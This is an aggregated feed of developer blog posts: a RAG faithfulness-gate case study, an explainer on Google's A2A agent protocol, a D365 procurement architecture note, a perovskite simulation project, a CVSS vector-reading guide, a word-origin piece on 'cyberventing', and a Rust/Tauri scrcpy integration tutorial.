A B2B SaaS team got an angry email from a customer last quarter. The customer's account team had asked the company's AI assistant whether their plan included SSO. The assistant said yes. The customer's IT team spent two days trying to configure it, escalated to support, and discovered the assistant had been wrong. SSO was on the Enterprise tier. The customer was on Pro.
The assistant had searched the documentation, found nothing definitive about which tiers included SSO, and produced a fluent answer based on what seemed plausible from training data. The user had no way to know it was a hallucination.
The fix was not "a better model." A larger LLM would have hallucinated more confidently with the same insufficient context. The fix was a layer that should have been there from day one: a faithfulness gate that checks whether the agent's response is actually grounded in the retrieved context before shipping it to the user.
This is one of the highest-leverage interventions for production AI agents. Most teams skip it because the failure mode is invisible until a customer complains.
Faithfulness is a single question: does the agent's response make claims that are supported by the context the agent retrieved?
If the agent searched the KB and found "Pro tier includes basic features X, Y, Z. Enterprise tier includes X, Y, Z plus advanced features A, B, C, including SSO," then a response saying "your Pro plan includes SSO" is unfaithful. The retrieved context does not support that claim.
This is different from "is the response correct." Correctness requires ground truth. Faithfulness only requires the retrieved context. You can check it without a human in the loop.
The mechanic: extract atomic claims from the response, check each claim against the retrieved context, return a score. Below threshold, the response is unfaithful and should not be shipped.
The pattern is straightforward:
Frameworks like Ragas implement this directly. You can also build it yourself with a single LLM call using a structured prompt. The judge model does not need to be the production model. We typically use GPT-4o-mini or Claude Haiku for the judge to keep costs low; they are accurate enough for this task.
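The extract, check, and score mechanic can be sketched in plain Python. This is a minimal illustration under stated assumptions, not the team's implementation and not the Ragas API: claims are split naively by sentence, and `is_supported` is a hypothetical judge callable that in practice would be a small LLM call. The default threshold of 0.85 is the value the team eventually settled on.

```python
import re
from typing import Callable, List


def split_claims(response: str) -> List[str]:
    """Naive claim extraction: one claim per sentence. A real gate would use an LLM."""
    parts = re.split(r"(?<=[.!?])\s+", response.strip())
    return [part for part in parts if part]


def faithfulness_score(
    response: str, context: str, is_supported: Callable[[str, str], bool]
) -> float:
    """Fraction of claims in the response that the judge finds supported by context."""
    claims = split_claims(response)
    if not claims:
        return 1.0  # no claims means nothing unsupported was asserted
    supported = sum(1 for claim in claims if is_supported(claim, context))
    return supported / len(claims)


def passes_gate(response, context, is_supported, threshold=0.85) -> bool:
    return faithfulness_score(response, context, is_supported) >= threshold


def toy_judge(claim: str, context: str) -> bool:
    # Stand-in for the judge model: exact substring match, ignoring case and final period.
    return claim.rstrip(".").lower() in context.lower()


context = "Pro tier includes basic features. Enterprise tier includes SSO."
response = "Pro tier includes basic features. Your Pro plan includes SSO."
score = faithfulness_score(response, context, toy_judge)
```

With the toy judge, the first sentence is supported and the second is not, so the response scores 0.5 and is rejected at the 0.85 threshold.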
Bigger models are not less likely to hallucinate. They are more confident hallucinators. Given the same insufficient context, GPT-4o will produce a better-written, more structured, more authoritative-sounding wrong answer than GPT-3.5 ever could.
The faithfulness gate works at a different layer than the model. It does not care how confident the model sounds. It only cares whether the claims in the response can be traced back to the retrieved context.
In the team's audit, faithfulness gates caught about 40% of the responses that customers had previously reported as wrong. Most of those would not have been caught by switching to a more expensive model.
Where to set the faithfulness threshold is a product decision, not a technical one.
The team we worked with was in B2B SaaS. We set the threshold at 0.88 initially, monitored the rejection rate (about 6% of responses), and tuned to 0.85 after a week when the rejection rate felt too aggressive for the user experience.
The agent has three options when a response fails the faithfulness check:
Retry with augmented context. The agent searches again with a query informed by the failure. Sometimes the original retrieval was insufficient and a second pass surfaces the missing context. Retry once, max twice. Beyond that, do not loop.
Return "I cannot answer this confidently." Honest about the limitation. Surfaces a real product problem (insufficient documentation, ambiguous query) that the team can address. Better than a confident wrong answer.
Escalate to human handoff. The agent surfaces the question to a human support agent, with the retrieved context attached. Useful for customer-facing systems where "I don't know" is not an acceptable terminal state.
Production teams ship all three. Retry first (cheap, and it often resolves the problem), fall back to an honest "I don't know" for low-stakes questions, and escalate high-stakes or repeated questions.
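One way to express that ordering is a small decision function. This is a sketch under assumptions: the `Action` names, the `high_stakes` flag, and the default of two retries (taken from "retry once, max twice") are illustrative rather than part of any framework.

```python
from enum import Enum

class Action(Enum):
    SHIP = "ship"
    RETRY = "retry"        # search again with a query informed by the failure
    DECLINE = "decline"    # honest "I cannot answer this confidently"
    ESCALATE = "escalate"  # hand off to a human with the context attached

def next_action(score: float, threshold: float, retries_used: int,
                high_stakes: bool, max_retries: int = 2) -> Action:
    """Pick what to do with a response given its faithfulness score."""
    if score >= threshold:
        return Action.SHIP
    if retries_used < max_retries:
        return Action.RETRY
    # Retries are exhausted: never loop further, pick a terminal state.
    return Action.ESCALATE if high_stakes else Action.DECLINE
```

Keeping the policy in one pure function makes it easy to log every non-`SHIP` decision, which is where the failed-check log comes from.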
The original system was a customer support agent with RAG over the documentation. We added:
Customer-reported wrong answers dropped 60% in the first month. The faithfulness gate did not improve correctness in the abstract; it just stopped the system from confidently shipping wrong answers to customers. The team initially worried that honest "I don't know" responses would make users unhappy, but they turned out to be well received. Users prefer "I don't know" to wrong answers, even when they think they want fast answers.
The unexpected benefit was the failed-check log. The team now had a list of every question the documentation could not confidently answer. That became the documentation backlog. Six months in, customer-reported issues had dropped 80% from the pre-gate baseline, partly from the gate and partly from the documentation improvements the gate surfaced.
A faithfulness gate prevents one specific failure mode: claims unsupported by retrieved context. It does not catch:
The gate is necessary but not sufficient for production reliability. It is the highest-leverage single intervention, but it is not the only intervention.
For production agents that handle factual queries (customer support, internal knowledge, compliance, anything where being wrong has cost):
The infrastructure cost is roughly $0.001 per response. The reduction in customer-reported errors is typically 40 to 60% in the first month.
This is not optional for production B2B agents. It is the layer that turns a demo into a product.
If your team has had customers report incorrect answers from your AI assistant, and "we'll switch to a better model" has not fixed it, the missing layer is almost certainly faithfulness checking.
Sapota offers a one-week implementation engagement that adds faithfulness checking to your existing agent, calibrates the threshold against your historical reports, and ships the retry and fallback logic as a working PR. We have done this for customer support agents, internal knowledge bases, and compliance tools.
Reach out via the AI engineering page with a few examples of incorrect responses your agent has given. The diagnostic conversation usually surfaces both the faithfulness gap and the documentation gaps that the gate will help expose.

---
## Why I Can't Stop Thinking About Google's New A2A Protocol

> Published: 2026-05-24 05:37:06+00:00
> Source: https://dev.to/devadhithiya/why-i-cant-stop-thinking-about-googles-new-a2a-protocol-5dml
> wpnews: https://wpnews.pro/news/why-i-can-t-stop-thinking-about-google-s-new-a2a-protocol

Google's new Agent2Agent (A2A) Protocol, unveiled at Google I/O 2026, is an open-source communication standard that enables AI agents built on different frameworks to discover, negotiate, and collaborate with each other. Unlike consumer-focused AI updates, A2A solves the problem of incompatible agent ecosystems by allowing agents to interact through standardized "Agent Cards" and task-based workflows without exposing internal code or data. The protocol fundamentally shifts software architecture toward interoperable, fault-tolerant multi-agent systems where specialized agents can be easily swapped or managed by third parties.

When Sundar Pichai dropped the words "agentic Gemini era" at Google I/O 2026, everyone naturally fixated on the shiny consumer updates. We all stared at Gemini Spark booking dinner reservations in the background, completely ignoring the absolute unit of a developer update standing right next to it.
Look, having a background AI handle your OpenTable reservations is cool, but if you’re a developer, the real sauce wasn't a consumer product. It was a communication standard.
I'm talking about the Agent2Agent (A2A) Protocol. Let's break down why A2A is the actual MVP of this year's I/O, and why you should care before your multi-agent codebase turns into an unmaintainable nightmare.
The Problem: We Rebuilt Silos, Just Smarter Ones
To understand why A2A matters, we have to look at the current state of AI agents. Over the last couple of years, we’ve seen an explosion of agentic frameworks—LangGraph, crewAI, IBM's BeeAI, and Google’s own Agent Development Kit (ADK).
The problem? They don't talk to each other.
Right now, trying to get a specialized LangChain agent to delegate a sub-task to your proprietary Google ADK agent usually hits a wall of incompatible formats. You want a multi-agent workflow? Great, you're locked into one ecosystem. We essentially built highly intelligent microservices, but somehow forgot to invent the HTTP to connect them.
Enter A2A: The Universal Translator
Originally seeded last year and heavily spotlighted at this I/O, the A2A protocol (now an open-source Linux Foundation project) is basically the universal translator for the agentic web.
A2A is an open standard that lets these isolated agents discover each other, negotiate, and actually collaborate—regardless of what model or framework they are built on. It is essentially JSON-RPC 2.0 over HTTP(S), but purpose-built for the chaos of autonomous AI.
How it Works
Instead of exposing internal memory or proprietary logic, A2A lets agents interact through a standardized rulebook:
Agent Cards: Think of this as a LinkedIn profile for AI agents. It’s a URL-accessible JSON file where the agent advertises its capabilities ("Fluent in Python," "Enjoys reading massive SQL databases").
The Client/Server Model: The A2A Client (the delegating agent) sends a request. The A2A Server (the remote agent doing the grunt work) exposes a compatible endpoint to take the job.
Tasks & Artifacts: Agentic work takes time. You can't just await and pray. A "Task" tracks the job status so your system isn't left hanging, and an "Artifact" is the actual deliverable streamed back to the client once the job is done.
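To make the three pieces concrete, here is a rough sketch of what a client might assemble. Everything specific in it is an assumption for illustration: the Agent Card fields, the endpoint URL, the `tasks/send` method name, and the parameter shape are not copied from the A2A specification, so check the spec before relying on any of them. Only the JSON-RPC 2.0 envelope (`jsonrpc`, `id`, `method`, `params`) is standard.

```python
import json
import uuid

# Hypothetical Agent Card: field names are illustrative, not taken from the spec.
agent_card = {
    "name": "inventory-agent",
    "description": "Answers stock-level questions",
    "url": "https://agents.example.com/a2a",  # placeholder endpoint
    "skills": [{"id": "check-stock", "description": "Look up stock for a SKU"}],
}

def build_request(method: str, params: dict) -> str:
    """Wrap a call in a JSON-RPC 2.0 envelope."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": str(uuid.uuid4()),  # lets the client match the response to the request
        "method": method,
        "params": params,
    })

# "tasks/send" is an assumed method name used only for this sketch.
payload = build_request("tasks/send", {"skill": "check-stock", "input": {"sku": "ABC-123"}})
decoded = json.loads(payload)
```

The client would POST `payload` to the URL advertised in the card, then track the returned task until an artifact arrives.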
Why This Changes the Game
A2A fundamentally shifts how we will architect software in the agentic era.
True Interoperability
You no longer have to build monolithic AI applications. You can build a specialized inventory agent using Anthropic's MCP to read your database. When stock is low, that agent can use A2A to securely ping a completely different supplier agent built by a third-party vendor. They negotiate an order without either party exposing their internal codebase.
Fault Isolation
By breaking workflows into discrete, A2A-compliant agents, your system becomes incredibly resilient. If one specialized agent starts hallucinating or fails, the whole workflow doesn't crash. You just hot-swap the misbehaving agent for a better one by updating the URL in your Agent Card.
Preserving Opacity
Enterprise adoption of multi-agent systems has been terrified of data leaks. A2A allows agents to collaborate while maintaining strict boundaries. My agent can ask your agent to solve a problem, and your agent just returns the answer. "Alright then, keep your secrets," my agent essentially says, completely blind to the 47 janky proprietary tools your agent used behind the scenes to get the job done.
The Takeaway
The TL;DR of Google I/O 2026? The future of AI isn't one giant, omnipotent God-Model. It's a massive, interconnected web of specialized multi-agent systems getting work done behind the scenes.
If you are building AI applications today, stop trying to make your single agent a know-it-all. Focus on making it an A2A Server. The devs who learn how to wire these autonomous systems together are the ones who are going to architect the next decade of the web.

---
## Centralized procurement D365: global address book + vendors

> Published: 2026-05-24 05:37:06+00:00
> Source: https://dev.to/sapotacorp/centralized-procurement-d365-global-address-book-vendors-27mj
> wpnews: https://wpnews.pro/news/centralized-procurement-d365-global-address-book-vendors

The article explains how multi-legal-entity enterprises using D365 Finance can avoid vendor data duplication by leveraging the Global Address Book and centralized procurement features. The Global Address Book creates a single canonical vendor record (party) that is released to each legal entity with per-LE metadata, while centralized procurement allows one legal entity to purchase on behalf of another. This architecture ensures consistent vendor data, enables cross-LE spend reporting via a simple query, and eliminates the need for custom sync services or manual intercompany transactions.

Multi-legal-entity enterprises standing up centralized procurement on D365 Finance face a recurring master data problem. The same vendor receives purchase orders from multiple legal entities (LEs), each with its own currency, tax rules, and approval hierarchy. Without discipline, the same vendor ends up configured three or four times - different addresses in each LE, different contact emails, different payment terms that don't actually reflect the contract.
Teams reach for custom sync services or per-LE vendor duplicates. Neither is necessary.
Configure separate vendor records per LE with custom sync. Adds a custom integration service between LEs to keep vendor data aligned. The service becomes a dependency that has to be maintained, monitored, and upgraded indefinitely. Every field addition requires integration changes.
Route all requisitions through manual intercompany transactions. Avoids duplicating vendors but shifts the pain to operations. Every cross-LE purchase becomes a multi-step manual process. Procurement teams resist; shadow-procurement workarounds appear within a month.
Enable procurement categories per LE and consolidate via Excel Power Query. Looks simple in design but means spend visibility lags behind transactions by whatever the reporting cycle is. CFO asks for "current total spend with Vendor X" and waits for a manual refresh.
The global address book plus centralized procurement features in D365 F&O.
What each piece does:
Global address book is the party-based master data layer that sits above legal entities. Each vendor is a party in the global address book with one canonical record. The party is released to each LE that transacts with it, with per-LE vendor metadata layered on top (payment terms, posting profile, default financial dimensions).
Centralized procurement allows one LE to purchase on behalf of another. The purchasing LE issues the PO, receives from the vendor, and then transfers the goods or services to the requesting LE through an intercompany transaction. Standard feature, configured at the purchasing-LE level.
Shared vendor governance - new vendor requests route through a central procurement workflow. The vendor is created at the party level, then released to LEs with approval. No vendor exists in any LE without central approval.
The rules that keep global address book clean:
Without discipline, the global address book becomes the same mess as per-LE records with extra steps.
What stays LE-specific:
The party data (name, address, tax registration) stays at the global level. The operational behavior stays per-LE. Both are automatically consistent because they're one object with layered attributes.
Centralized procurement doesn't mean centralized approval. Each LE configures its own approval workflow based on:
The workflow is LE-local. The vendor record is global. The PO knows which LE it's from and applies the right workflow.
When LE A buys on behalf of LE B:
Standard functionality. Configured once per LE pair at setup.
With shared vendor master, cross-LE spend reporting is a query, not a consolidation project. Power BI over the shared vendor tables, financial dimensions cutting across LEs, and Procurement analytics workspaces surface:
All of this works because the vendor is one record.
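The "one record, layered attributes" idea and the resulting spend query can be modelled in a few lines. This is a conceptual sketch in Python, not D365 code: the class names, the LE codes, and the invoice tuples are hypothetical, and amounts are assumed to be already converted to a single reporting currency.

```python
from collections import defaultdict
from dataclasses import dataclass, field

@dataclass
class VendorRelease:
    legal_entity: str
    payment_terms: str  # per-LE operational metadata

@dataclass
class Party:
    party_id: str
    name: str  # global data, shared by every LE
    releases: dict = field(default_factory=dict)  # legal entity -> VendorRelease

    def release_to(self, legal_entity: str, payment_terms: str) -> None:
        self.releases[legal_entity] = VendorRelease(legal_entity, payment_terms)

def spend_by_party(invoices):
    """Sum invoice amounts per party across all legal entities."""
    totals = defaultdict(float)
    for party_id, _legal_entity, amount in invoices:
        totals[party_id] += amount
    return dict(totals)

acme = Party("P-001", "Acme Supplies")
acme.release_to("LE-A", "Net30")
acme.release_to("LE-B", "Net45")

invoices = [("P-001", "LE-A", 1200.0), ("P-001", "LE-B", 800.0), ("P-002", "LE-A", 50.0)]
totals = spend_by_party(invoices)
```

Because every invoice carries the same party identifier regardless of LE, the cross-LE total is a single grouping step rather than a matching exercise across duplicate vendor records.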
A working centralized procurement architecture has:
The feature existed before the requirement. Getting the architecture right is about using it correctly, not extending it.

---
## Perovskite cell scaps simulation analysis

> Published: 2026-05-24 05:35:41+00:00
> Source: https://dev.to/asphane/perovskite-cell-scaps-simulation-analysis-544n
> wpnews: https://wpnews.pro/news/perovskite-cell-scaps-simulation-analysis

This article describes a final-year project that uses SCAPS-1D simulation data to create a structured analysis pipeline for Perovskite Solar Cells (PSCs). The project includes modules for studying dark I-V and illuminated J-V curves, layer thickness effects, temperature variation, and quantum efficiency, along with automated report generation and a machine-learning dashboard. The author credits GitHub Copilot for accelerating repetitive coding tasks, allowing more focus on the physics and analysis logic.

This is a submission for the GitHub Finish-Up-A-Thon Challenge
I built a final-year project around Perovskite Solar Cell (PSC) simulation and analysis using SCAPS-1D data. The repository is not just a set of plots; it is a structured analysis pipeline that studies dark I-V behavior, illuminated J-V curves, layer thickness effects, temperature variation, quantum efficiency, and ETL/HTL sweeps. I also added an automated report-generation workflow and a machine-learning dashboard to make the simulation results easier to explore and interpret.
GitHub repository: https://github.com/Asphane/perovskite-cell-scaps-simulation-analysis
Demo video: https://drive.google.com/file/d/1zSmQiwvoN42cu0jrwqucPoSIW9Lh2u1g/view?usp=sharing
This project started as raw simulation output and scattered analysis notebooks. I turned it into a cleaner, more complete project by organizing the work into separate modules for J-V analysis, dark I-V analysis, thickness optimization, QE, temperature sweep, and ETL/HTL sweep studies. I also added report generation so the findings could be documented more systematically instead of staying buried inside notebooks.
GitHub Copilot helped me move faster on repetitive work: notebook boilerplate, plotting code, data handling, and report-generation scripts. It reduced the amount of time I spent writing mechanical code and let me focus more on the physics, the analysis logic, and the structure of the final project.

---
## What Do Those CVSS Letters Mean? A Guide to Finally Understanding It

> Published: 2026-05-24 05:32:16+00:00
> Source: https://dev.to/byron_lainez/que-significan-esas-letras-del-cvss-guia-para-entenderlo-de-una-vez-gmh
> wpnews: https://wpnews.pro/news/que-significan-esas-letras-del-cvss-guia-para-entenderlo-de-una-vez

The article explains the Common Vulnerability Scoring System (CVSS), which uses a vector string to describe the severity and characteristics of a security vulnerability, not just a single numerical score. It breaks down the components of CVSS v3.1 and v4.0 vectors using a house burglary analogy, detailing how factors like Attack Vector, Complexity, and Impact determine the overall risk. The guide emphasizes that understanding the vector is crucial for an appropriate response, as the number alone does not explain the nature of the attack.

Every time a major CVE drops, someone pastes the CVSS vector into the team chat and everyone pretends to understand it. Spoiler: most people only look at the number (9.1 CRITICAL) and ignore the rest.
The problem is that the number only tells you how severe it is. The vector tells you why, and that completely changes how you respond.
CVSS (Common Vulnerability Scoring System) is a scoring system for describing security vulnerabilities. It does not just give you a number: it gives you a vector, which is essentially a compressed description of how the attack works.
There are two versions you will see often: v3.1 (the most common today) and v4.0 (newer and more detailed). I will explain both.
💡 The scoring scale
0.1–3.9 LOW
4.0–6.9 MEDIUM
7.0–8.9 HIGH
9.0–10.0 CRITICAL
The burglar analogy
To understand the CVSS vector, imagine that a vulnerability is a way of breaking into a house. The CVSS vector answers these questions about the "burglary":
🏠 Analogy
- **Where can the burglar attack from?** From the street, or do they have to be in the garden? *(Attack Vector)*
- **Is it hard to get in?** An open door or a high-security lock? *(Attack Complexity)*
- **Do they need a key?** Or can they get in with nothing? *(Privileges Required)*
- **Does someone have to open the door from inside?** *(User Interaction)*
- **What can be stolen?** Documents, furniture, or can they break things too? *(Impacts: C/I/A)*
CVSS v3.1, letter by letter
Let's take this real vector from CVE-2024-9465 (Palo Alto Expedition):
CVSS v3.1: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N`

| Code | Name | Value in this CVE | What it means in plain words |
|---|---|---|---|
| AV:N | Attack Vector: Network | 🔴 Dangerous | The attacker does not need to be physically nearby. They can attack from anywhere in the world over the internet. *(N=Network, A=Adjacent, L=Local, P=Physical)* |
| AC:L | Attack Complexity: Low | 🔴 Dangerous | The attack is easy to carry out. It requires no special conditions, exact timing, or advanced knowledge. Anyone with the exploit can do it. *(L=Low, H=High)* |
| PR:N | Privileges Required: None | 🔴 Dangerous | The attacker needs no prior account or password. They arrive, attack, done. *(N=None, L=Low, H=High)* |
| UI:N | User Interaction: None | 🔴 Dangerous | No user has to click anything, open any file, or visit any link. The attack works on its own. *(N=None, R=Required)* |
| S:U | Scope: Unchanged | ⚪ Neutral | The impact stays within the attacked system. It does not automatically "jump" to other systems. *(U=Unchanged, C=Changed)* |
| C:H | Confidentiality: High | 🔴 Critical | All confidential information is exposed: passwords, API keys, configurations. The attacker can read everything. *(N=None, L=Low, H=High)* |
| I:H | Integrity: High | 🔴 Critical | The attacker can modify or create data. In this case, they can write arbitrary files to the system. *(N=None, L=Low, H=High)* |
| A:N | Availability: None | 🟢 No impact | The attacker cannot take the system down. The service stays available while it is quietly being exploited. *(N=None, L=Low, H=High)* |

⚠️ How to read the result
AV:N + AC:L + PR:N + UI:N in the same vector means "anyone on the internet, with no effort, no account, and no help from anyone" can carry out the attack. Combined with C:H, that is the worst possible combination for confidential data.
CVSS v4.0: what changes?
Version 4.0 is newer and more detailed. It splits the impact into two parts: the system attacked directly (Vulnerable System) and other systems that could be affected (Subsequent System).
CVSS v4.0: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:H/SI:N/SA:N`

| Code | Name | Value | What it means |
|---|---|---|---|
| AV:N | Attack Vector: Network | 🔴 | Same as in v3.1: attack over the internet, without being nearby. |
| AC:L | Attack Complexity: Low | 🔴 | Easy to carry out, no special conditions. |
| AT:N | Attack Requirements: None | 🔴 | **New in v4.0.** The attack does not depend on any external condition outside the attacker's control (such as active sessions or specific configurations). *(N=None, P=Present)* |
| PR:N | Privileges Required: None | 🔴 | No account, no authentication. |
| UI:N | User Interaction: None | 🔴 | Nobody has to do anything for the attack to work. |
| VC:H | Vulnerable System Confidentiality: High | 🔴 | **The attacked system (Expedition):** all of its information is exposed. Hashes, configs, API keys. |
| VI:L | Vulnerable System Integrity: Low | 🟡 | **The attacked system:** the attacker can modify some data but does not have full write control. Partial impact on integrity. |
| VA:N | Vulnerable System Availability: None | 🟢 | **The attacked system:** keeps running. There is no denial of service. |
| SC:H | Subsequent System Confidentiality: High | 🔴 | **Other systems (the PAN-OS firewalls):** because the API keys are exposed, the confidentiality of the firewalls is compromised too. The damage spreads. |
| SI:N | Subsequent System Integrity: None | 🟢 | **Other systems:** the attacker cannot modify data on the firewalls directly through this vector. |
| SA:N | Subsequent System Availability: None | 🟢 | **Other systems:** the attacker cannot take the firewalls down with this attack. |

💡 The big improvement in v4.0
v4.0 separates the impact into VC/VI/VA (the system attacked directly) and SC/SI/SA (systems affected afterwards). In this CVE, that is key: Expedition has SC:H because the exposed API keys compromise the firewalls. v3.1 did not capture that chain effect well.
Visual summary: how to read a vector quickly
`CVSS:3.1 / AV:? / AC:? / PR:? / UI:? / S:? / C:? / I:? / A:?`
- AV: Where can the attacker attack from?
- AC: Is it hard to carry out?
- PR: Does it need an account or password?
- UI: Does someone have to click?
- S: Does the damage spread to other systems?
- C: Can it read private data?
- I: Can it modify data?
- A: Does the service go down?

Risk values (from highest to lowest):
- 🔴 Worst case: N (None) on PR or UI, or H (High) on an impact metric
- 🟡 Partial impact: L (Low)
- 🟢 No effect in that category: N (None) on an impact metric
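Reading a vector by eye can be backed up with a small script. The sketch below parses a v3.1 vector and computes its base score using the metric weights and the round-up rule as I understand them from the public CVSS v3.1 specification; the function names are my own, and it covers base metrics only (no temporal or environmental scores, no v4.0).

```python
import math

WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when Scope is Changed.
PR = {"U": {"N": 0.85, "L": 0.62, "H": 0.27}, "C": {"N": 0.85, "L": 0.68, "H": 0.5}}

def roundup(x: float) -> float:
    """Round up to one decimal place while avoiding floating-point artifacts."""
    i = round(x * 100000)
    return i / 100000.0 if i % 10000 == 0 else (math.floor(i / 10000) + 1) / 10.0

def parse_vector(vector: str) -> dict:
    """Split 'CVSS:3.1/AV:N/...' into {'AV': 'N', ...}."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    return dict(p.split(":") for p in parts)

def base_score(vector: str) -> float:
    m = parse_vector(vector)
    changed = m["S"] == "C"
    iss = 1 - (1 - WEIGHTS["C"][m["C"]]) * (1 - WEIGHTS["I"][m["I"]]) * (1 - WEIGHTS["A"][m["A"]])
    impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15 if changed else 6.42 * iss
    exploitability = (8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]]
                      * PR[m["S"]][m["PR"]] * WEIGHTS["UI"][m["UI"]])
    if impact <= 0:
        return 0.0
    total = 1.08 * (impact + exploitability) if changed else impact + exploitability
    return roundup(min(total, 10))

score = base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N")
```

For the CVE-2024-9465 v3.1 vector used above, `score` comes out at 9.1, which matches the CRITICAL band in the scoring scale.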
The sentence that sums it all up
When you see a vector like the one for CVE-2024-9465, translate it into a single sentence before sending it to the team:
📝 Plain-language translation: **"Anyone on the internet can attack this system without credentials or anyone's help, and gain full access to all confidential data, including the keys to your firewalls."**
That is what the vector says. Now you know why it has a 9.2.
Conclusion
The CVSS number tells you whether to worry. The vector tells you how to worry. AV:N/AC:L/PR:N/UI:N together is the most dangerous combination there is: easy, remote, and not dependent on anyone. When you see it, act first and analyze later.
✅ Rule of thumb
If the first 4 fields are AV:N / AC:L / PR:N / UI:N, the attacker can be anyone on the internet, attacking without effort, without an account, and without help. Patch today.

---
## Limerick

> Published: 2026-05-24 05:29:01+00:00
> Source: https://www.worldwidewords.org/surprise.html
> wpnews: https://wpnews.pro/news/limerick

The article defines "cyberventing" as the practice of using electronic means, such as websites or mass emails, to express anger or complaints, particularly against employers, retailers, or former colleagues. It notes that some employers have created official internal complaint sites to address issues openly, while also acknowledging that conflict resolution is a more effective long-term strategy for maintaining strong work relationships. The term is illustrated by examples like the "My Boss Sucks" website in New Zealand and a mass emailing incident at Intel.

Cyberventing
What do you do when you’re unhappy with your boss? Traditionally, you grumble to co-workers in the hallway, round the water cooler or over a drink after work. When e-mail, bulletin boards and chat rooms came along, some wrote messages to each other. Now the idea has been taken a step further: disgruntled employees are setting up Web sites to provide a forum for complaints. The term invented for this is cyberventing: venting your anger by electronic means. Some employers have even set up official grousing sites on internal Web systems, reasoning that it’s better to get the complaints out in the open than have problems fester in the dark. The term has also been applied to Web sites set up by people who are angry at the treatment they’ve received from retailers or suppliers, and also to the mass e-mailing of staff by aggrieved ex-workers, such as in a recent case at Intel.
While cyberventing is a convenient way to blow off steam, conflict resolution is the best way in the long run to build and maintain strong work relationships, he contends.
HR Magazine, Nov. 1999
Bosses in New Zealand must be pretty good, because none of them get a mention in the My Boss Sucks website. This is part of a new trend on the Internet — cyberventing, where you can complain to your heart’s content.
The Press (Canterbury, New Zealand), Mar. 2000

---
## scrcpy Integration in a Tauri App — Android Screen Mirroring on Mac

> Published: 2026-05-24 05:25:01+00:00
> Source: https://dev.to/hiyoyok/scrcpy-integration-in-a-tauri-app-android-screen-mirroring-on-mac-27k3
> wpnews: https://wpnews.pro/news/scrcpy-integration-in-a-tauri-app-android-screen-mirroring-on-mac

The article describes how to integrate scrcpy, an open-source Android screen mirroring tool, into a Tauri app for Mac. It covers launching scrcpy from Rust code, bundling it as a universal binary within the app's resources, detecting when the mirror window closes, and supporting multiple Android devices via ADB serial selection. The author tested the implementation on an 8-year-old MacBook Air while shipping seven Mac apps as a solo developer.

All tests run on an 8-year-old MacBook Air.
All results from shipping 7 Mac apps as a solo developer. No sponsored opinion.
HiyokoKit includes Android remote control via scrcpy. Launching and managing scrcpy from a Tauri app has specific challenges.
Here's how I handle it.
What scrcpy is
scrcpy is an open-source tool that mirrors and controls an Android device screen over ADB. It's the best free option for Android screen mirroring on Mac — fast, low latency, no app required on the device.
Launching scrcpy from Rust
```rust
use std::process::{Child, Command};
use std::sync::Mutex;

pub struct ScrcpyProcess {
    // Handle to the running scrcpy process, if any.
    child: Option<Child>,
}

impl ScrcpyProcess {
    pub fn start(
        &mut self,
        device_serial: &str,
        max_size: u32,
        bit_rate: &str,
    ) -> Result<(), AppError> {
        let child = Command::new("scrcpy")
            .args([
                "--serial", device_serial,
                "--max-size", &max_size.to_string(),
                "--video-bit-rate", bit_rate,
                "--window-title", "Android Mirror",
                "--no-audio",
            ])
            .spawn()
            .map_err(|e| AppError::Scrcpy(e.to_string()))?;
        self.child = Some(child);
        Ok(())
    }

    pub fn stop(&mut self) {
        if let Some(mut child) = self.child.take() {
            child.kill().ok();
            // Reap the process so it does not linger as a zombie.
            child.wait().ok();
        }
    }

    pub fn is_running(&mut self) -> bool {
        if let Some(child) = &mut self.child {
            // try_wait returns Ok(None) while the process is still alive.
            child.try_wait().map(|s| s.is_none()).unwrap_or(false)
        } else {
            false
        }
    }
}
```
Bundling scrcpy
scrcpy needs to be available on the user's machine or bundled with your app. I bundle it in app resources as a universal binary:
```json
{
  "bundle": {
    "resources": [
      "bin/scrcpy",
      "bin/adb"
    ]
  }
}
```
At runtime, get the resource path:
```rust
let scrcpy_path = app_handle
    .path()
    .resource_dir()
    .unwrap()
    .join("bin/scrcpy");
```
Detecting when scrcpy exits
scrcpy exits when the user closes the mirror window. Detect this to update your UI:
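```rust
use std::time::Duration;

// Poll in the background until scrcpy exits, then notify the frontend.
tokio::spawn(async move {
    loop {
        tokio::time::sleep(Duration::from_secs(1)).await;
        // Hold the lock only long enough to check the process state.
        let running = {
            let mut proc = scrcpy_state.lock().unwrap();
            proc.is_running()
        };
        if !running {
            app_handle.emit("scrcpy-stopped", ()).ok();
            break;
        }
    }
});
```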
Multiple device support
scrcpy's --serial flag selects a specific device when multiple are connected. Get the serial from adb devices and pass it explicitly:
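```rust
// Awaiting `.output()` requires the async Command from tokio, not std.
use tokio::process::Command;

async fn get_device_serial() -> Result<String, AppError> {
    let output = Command::new("adb")
        .args(["devices"])
        .output()
        .await
        .map_err(|e| AppError::Device(e.to_string()))?;
    let stdout = String::from_utf8_lossy(&output.stdout);
    stdout
        .lines()
        .skip(1) // skip the "List of devices attached" header
        .filter_map(|l| {
            // Accept only rows whose state column is exactly "device",
            // which excludes "offline" and "unauthorized" entries.
            let mut cols = l.split_whitespace();
            match (cols.next(), cols.next()) {
                (Some(serial), Some("device")) => Some(serial.to_string()),
                _ => None,
            }
        })
        .next()
        .ok_or_else(|| AppError::Device("No device found".into()))
}
```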
If this was useful, a ❤️ helps more than you'd think — thanks!
Hiyoko PDF Vault → https://hiyokomtp.lemonsqueezy.com/checkout
X → @hiyoyok

---
## Shopify theme editor: design tokens merchants can edit

> Published: 2026-05-24 05:20:05+00:00
> Source: https://dev.to/sapotacorp/shopify-theme-editor-design-tokens-merchants-can-edit-377i
> wpnews: https://wpnews.pro/news/shopify-theme-editor-design-tokens-merchants-can-edit

